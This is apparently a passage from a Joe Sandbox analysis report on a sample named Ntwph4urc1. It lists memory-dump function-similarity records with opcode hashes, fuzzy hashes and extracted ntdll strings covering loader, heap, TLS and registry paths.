                                              • Opcode ID: 385224a690fd851f640e33d380015d6261bf3037cde0406f7c8a6edec198535e
                                              • Instruction ID: 60ee16a681aba07eb6447a7dabcecc8c808ff2fd54c88fadc3fe84af07ea3493
                                              • Opcode Fuzzy Hash: 385224a690fd851f640e33d380015d6261bf3037cde0406f7c8a6edec198535e
                                              • Instruction Fuzzy Hash: A9B18CB1A04345AFE711CF55CC80B5BB7E8AB88764F61082AFA40AB280D774EC15CB93
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                              • API String ID: 0-318774311
                                              • Opcode ID: cbe1f1857f0ad48781a1f05c4895a94c951d63e99e3a832634fc7c3cc7467f9c
                                              • Instruction ID: ba5b32b32b266092804f1497aec0141fb65323c341788438dabe04c9f22733ec
                                              • Opcode Fuzzy Hash: cbe1f1857f0ad48781a1f05c4895a94c951d63e99e3a832634fc7c3cc7467f9c
                                              • Instruction Fuzzy Hash: A6817CB5A08740EFE311CB15C840B6AB7E8EF8A755F54892DF980DB391EB74D904CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                              • API String ID: 0-3870751728
                                              • Opcode ID: f01e8a8d5bf2a32b182223a2d082c9a6af7b25b2815b7230a7b58a87f8210530
                                              • Instruction ID: c39f6ee66fed9288f94a0e0b4b826190ee4928dec38c6dd80f360b2564c2b3c9
                                              • Opcode Fuzzy Hash: f01e8a8d5bf2a32b182223a2d082c9a6af7b25b2815b7230a7b58a87f8210530
                                              • Instruction Fuzzy Hash: 3A917CB0E006159FEB14CF69C984BADBBF1FF48354F24816AD905AB391E7359842CF92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                              • API String ID: 0-373624363
                                              • Opcode ID: 2d3189d125b4bfb3110faa3c3dd0e230c8d1d218feb4435e1387a92975f053e3
                                              • Instruction ID: 03bcadf3fdb7e41f71f8f39bfa75a7bb2f6d2f829190c10530145051871ab9ed
                                              • Opcode Fuzzy Hash: 2d3189d125b4bfb3110faa3c3dd0e230c8d1d218feb4435e1387a92975f053e3
                                              • Instruction Fuzzy Hash: 9A91AEB5E04319CFEB22DF59C840BAEB7B4EF05364F214196E811EB294D7789E40CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$&$@
                                              • API String ID: 0-1537733988
                                              • Opcode ID: 8b095217a7f05edfefcf237be3ce2d41b7f6954b71f706d7c96cbe584a6ad996
                                              • Instruction ID: be184d96b10249a3d9d072a00b2c32d327075bf802483240b962ec703d3715cc
                                              • Opcode Fuzzy Hash: 8b095217a7f05edfefcf237be3ce2d41b7f6954b71f706d7c96cbe584a6ad996
                                              • Instruction Fuzzy Hash: F471D274A08301DFEB10DF25C980A1BBBEEFF85758F208A1DE49987291D731D906CB92
                                              Strings
                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36A1B82A
                                              • GlobalizationUserSettings, xrefs: 36A1B834
                                              • TargetNtPath, xrefs: 36A1B82F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                              • API String ID: 0-505981995
                                              • Opcode ID: e4e8e724f6e4fac6c78156381909360eb50288e3ae6bf438703545e456ebabce
                                              • Instruction ID: ba9111c2e8c19b3b636227839bc3f62caa8a5ec7a8e1b69684be1d2afde6f2e3
                                              • Opcode Fuzzy Hash: e4e8e724f6e4fac6c78156381909360eb50288e3ae6bf438703545e456ebabce
                                              • Instruction Fuzzy Hash: B9619D72D01229AFDB21DF55CC98BDAB7F8AF18750F5101E9A908AB250DB34DE85CF90
                                              Strings
                                              • HEAP: , xrefs: 3699E6B3
                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3699E6C6
                                              • HEAP[%wZ]: , xrefs: 3699E6A6
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                              • API String ID: 0-1340214556
                                              • Opcode ID: 04d89eb1e82eb187150dc356050af2e5fc2aefcfdef3cfe00334fe6d5540efc4
                                              • Instruction ID: 4913350ea203f467e7db564ecd7382b9fcf75adfe51a04b37af0facc3131df83
                                              • Opcode Fuzzy Hash: 04d89eb1e82eb187150dc356050af2e5fc2aefcfdef3cfe00334fe6d5540efc4
                                              • Instruction Fuzzy Hash: FD51E275A11B84EFE312CBA9C984F9ABBF8EF05344F2400A5E681CB692D734ED41CB51
                                              Strings
                                              • minkernel\ntdll\ldrmap.c, xrefs: 369AA59A
                                              • LdrpCompleteMapModule, xrefs: 369AA590
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 369AA589
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: 7a53f357e561bd0fe7313c324cdd6bb2a3f5feae7a9369160fd4a8fdfabc8e88
                                              • Instruction ID: c41bc96c336212383ef94efdf9eed949f00491424e44a0f8c45b9ae8befbbe27
                                              • Opcode Fuzzy Hash: 7a53f357e561bd0fe7313c324cdd6bb2a3f5feae7a9369160fd4a8fdfabc8e88
                                              • Instruction Fuzzy Hash: 9D511478A007859FF721CB1ECD44B0A7BE8AF00768F280195E9919B6E2DB74ED01CB85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                              • API String ID: 0-1151232445
                                              • Opcode ID: 82122867d3245909e5d47a3f024367ef67c1f127bac6c21c51af1eb10edadf47
                                              • Instruction ID: cc8a8fb71eeb161930f11a82b0cfd451350ae4dc5dd6d4c43a01ed9cbe850d32
                                              • Opcode Fuzzy Hash: 82122867d3245909e5d47a3f024367ef67c1f127bac6c21c51af1eb10edadf47
                                              • Instruction Fuzzy Hash: 6A4138B4B013808FFB25CE1DC8987AA77E4DF0139CF744499D4468F246DAA4D886DF56
                                              Strings
                                              • minkernel\ntdll\ldrtls.c, xrefs: 369B1B4A
                                              • LdrpAllocateTls, xrefs: 369B1B40
                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 369B1B39
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-4274184382
                                              • Opcode ID: 38b4bbde86a2b1bfc3816ea791b323663fa5c7d8970f70a8411761ff6a7da056
                                              • Instruction ID: e7fd5bc137417df129046d4cff2f3b2c0cf729c71a4e94b7180c19a4aadd7829
                                              • Opcode Fuzzy Hash: 38b4bbde86a2b1bfc3816ea791b323663fa5c7d8970f70a8411761ff6a7da056
                                              • Instruction Fuzzy Hash: 694156B5E00609EFDB15CFA9CC40AAEBBB6FF48754F648119E505A7211EB35A901CF90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-964947082
                                              • Opcode ID: 6f38c7198032369259b0b3adaf447e3a37e44a799c898d49bdaa402370642bfa
                                              • Instruction ID: 3a5654e7ba0526ddaba5fde3cd45940bb3890ac294ebb1aa7a4fe4fc992a7c26
                                              • Opcode Fuzzy Hash: 6f38c7198032369259b0b3adaf447e3a37e44a799c898d49bdaa402370642bfa
                                              • Instruction Fuzzy Hash: 0041B1B5A21348EFD710CF598C90AAA3BE9EB54395F324159EA019F242CA32DC56CB51
                                              Strings
                                              • RtlCreateActivationContext, xrefs: 369B29F9
                                              • SXS: %s() passed the empty activation context data, xrefs: 369B29FE
                                              • Actx , xrefs: 369733AC
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                              • API String ID: 0-859632880
                                              • Opcode ID: 4198255e51fabb4f4e76420be4171f359bd926a6b7aa2e4c7cf3746c9cf63ed9
                                              • Instruction ID: 07a2b7ece50c2d416f3ac4219c32f90049fadfa82850a3f4f30fb927aceb7a6b
                                              • Opcode Fuzzy Hash: 4198255e51fabb4f4e76420be4171f359bd926a6b7aa2e4c7cf3746c9cf63ed9
                                              • Instruction Fuzzy Hash: E03124326103159FEF16CF5AC880BA677A8EF48720F614469ED049F286CB31DC41CBD1
                                              Strings
                                              • GlobalFlag, xrefs: 369CB68F
                                              • @, xrefs: 369CB670
                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 369CB632
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                              • API String ID: 0-4192008846
                                              • Opcode ID: 662cbd1fab9daca6c82396bda6db552fbf217b56967cfbeec50da9b6eb1a01f4
                                              • Instruction ID: acad583ff6f9cd379aaabbe3a9b3be7dcb744007ebd0719f9ed3f34462dbb5f9
                                              • Opcode Fuzzy Hash: 662cbd1fab9daca6c82396bda6db552fbf217b56967cfbeec50da9b6eb1a01f4
                                              • Instruction Fuzzy Hash: 26316AB1E40609AFDB00DFA5DD80AEFBBBCEF44744F5004A9EA05A7255E7349E04CBA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                              • API String ID: 0-1050206962
                                              • Opcode ID: 00faa0b748f27516fcbfdd068a339620c0d0c0bfd5272ea327de757672201064
                                              • Instruction ID: 19d4552638fb206709a66387f93be00b147c9f72cb702c60e108183efcabc248
                                              • Opcode Fuzzy Hash: 00faa0b748f27516fcbfdd068a339620c0d0c0bfd5272ea327de757672201064
                                              • Instruction Fuzzy Hash: 95316B76D00219AFEB12DF95CC84EEEFBBDEB44658F410066EA00A7211E738DD44CBA1
                                              Strings
                                              • minkernel\ntdll\ldrtls.c, xrefs: 369B1A51
                                              • DLL "%wZ" has TLS information at %p, xrefs: 369B1A40
                                              • LdrpInitializeTls, xrefs: 369B1A47
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-931879808
                                              • Opcode ID: cf0d523d4b945f398e26f3d1705d5c9b3da3ce66e98cd705fb5e70746a157d11
                                              • Instruction ID: 7b4e64d7e435ef0d0d7278b473663d6b3a3e10ae5a5daa1720f5000be1c8fe43
                                              • Opcode Fuzzy Hash: cf0d523d4b945f398e26f3d1705d5c9b3da3ce66e98cd705fb5e70746a157d11
                                              • Instruction Fuzzy Hash: C731E271A10305ABF712CB5CCC45FAA7BBDBF44798F290159EA00B7180DB70BE468B91
                                              Strings
                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3698127B
                                              • BuildLabEx, xrefs: 3698130F
                                              • @, xrefs: 369812A5
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 0-3051831665
                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                              • Instruction ID: ccb02f33b23a3871ed5ae55b601449104bed28c635869845029e68e677fc581d
                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                              • Instruction Fuzzy Hash: 29318B72900219ABDF11DF95CC44EEEBBBDEB84750F004026E904A7261E730DE05CBA5
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: RtlValidateHeap
                                              • API String ID: 3446177414-1797218451
                                              • Opcode ID: 168ac347900a5eb0018afd335d3fbd40f597407f48859671646179fd72474164
                                              • Instruction ID: 245fbe4885b012aad0d45e7927bfbdaa48780833d435e561ed51e795b057d307
                                              • Opcode Fuzzy Hash: 168ac347900a5eb0018afd335d3fbd40f597407f48859671646179fd72474164
                                              • Instruction Fuzzy Hash: D4411F76E013859FEB06CFA4CC947ADBBB6FF84254F248258D811AB281CB348901DBA5
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: kLsE
                                              • API String ID: 3446177414-3058123920
                                              • Opcode ID: 17087f5a6db877e2307f0954b28559c02499040acca90991421c1aac3cc1150b
                                              • Instruction ID: e82a7518cbc83eb54a93fb4ebd2023020d6d8e0d093caa8dc2ad3f4a5fadd3c3
                                              • Opcode Fuzzy Hash: 17087f5a6db877e2307f0954b28559c02499040acca90991421c1aac3cc1150b
                                              • Instruction Fuzzy Hash: 264136719013518AE752DFA9CD88B653B9AEB407E4F312159EE50AF0C2CB754C93C7A3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@
                                              • API String ID: 0-149943524
                                              • Opcode ID: 166fe6f826dd1beca6cdd3af9bf86b7adf06336d4a77257279e67581c6dfea0d
                                              • Instruction ID: 1dcbfcc2aa917245bf17373f84ee3f28e67770befb5e120fc6eef98f7a14874b
                                              • Opcode Fuzzy Hash: 166fe6f826dd1beca6cdd3af9bf86b7adf06336d4a77257279e67581c6dfea0d
                                              • Instruction Fuzzy Hash: 0832B2B89083518BE724CF15C89073EB7F5EF84784F62491EFA859B2A1E734D854CB92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: dc8af48a37a7d87fb547afb8b8f241b70acf7af1314443210d87a92063b0c61b
                                              • Instruction ID: 181c4f5218c53d3401cfff7eea086b959f6883c689fc5cdf7463c757d8d59b05
                                              • Opcode Fuzzy Hash: dc8af48a37a7d87fb547afb8b8f241b70acf7af1314443210d87a92063b0c61b
                                              • Instruction Fuzzy Hash: 0731F035615B16EFE752EF64CE80A8AF7A9FF44358F208025E90057A50EB70EC21CBD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ost.exe
                                              • API String ID: 0-3048828413
                                              • Opcode ID: fc53b3e39c9f8f3e9a5e5bc9bf8b395c84e2dacea0225bf2f5272827f373a3eb
                                              • Instruction ID: 6dffb3d6b3ff95038e2014f02381ccfc837202ad419d1eede733b02b71e6ffbb
                                              • Opcode Fuzzy Hash: fc53b3e39c9f8f3e9a5e5bc9bf8b395c84e2dacea0225bf2f5272827f373a3eb
                                              • Instruction Fuzzy Hash: 36C2EE74E002158FEB14CF59C890BAEB7B6FF84314F268169DA55AB361DB30ED52CB80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$
                                              • API String ID: 3446177414-233714265
                                              • Opcode ID: 39e7b80ba65dc845343a020bd9d5107633c145ca580760ec88ca05f074320d77
                                              • Instruction ID: f017fc703b03a591801809341977ef7ec7d5431c63a507f3f8d1f1a3fc2be1c9
                                              • Opcode Fuzzy Hash: 39e7b80ba65dc845343a020bd9d5107633c145ca580760ec88ca05f074320d77
                                              • Instruction Fuzzy Hash: 9E61CC75E00749DBEB21CFA8C980BADB7B5FF44328F214069D6056B681DB34AD45CF92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                              • API String ID: 0-118005554
                                              • Opcode ID: 8da786d411ba4c825e57e745f300aa705920f5bb214a262931177a82c03faff1
                                              • Instruction ID: 0a23120c8a6554fee0139356a7528a49ea775115c08d44f2332a98f12c8e787f
                                              • Opcode Fuzzy Hash: 8da786d411ba4c825e57e745f300aa705920f5bb214a262931177a82c03faff1
                                              • Instruction Fuzzy Hash: AD31ED756087419BD301CF6AD845B1EB7E8EF8A751F91486AF940CB391EB30D805CBA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .Local\$@
                                              • API String ID: 0-380025441
                                              • Opcode ID: 251fc3a9f2a179e49c501bf5eafcb2e2375e4b36ed70d7a74e8d70bdc6839746
                                              • Instruction ID: ca817721cd1662cf67fe6712e2854090b0ea6807914c759b9354ce95b8897a12
                                              • Opcode Fuzzy Hash: 251fc3a9f2a179e49c501bf5eafcb2e2375e4b36ed70d7a74e8d70bdc6839746
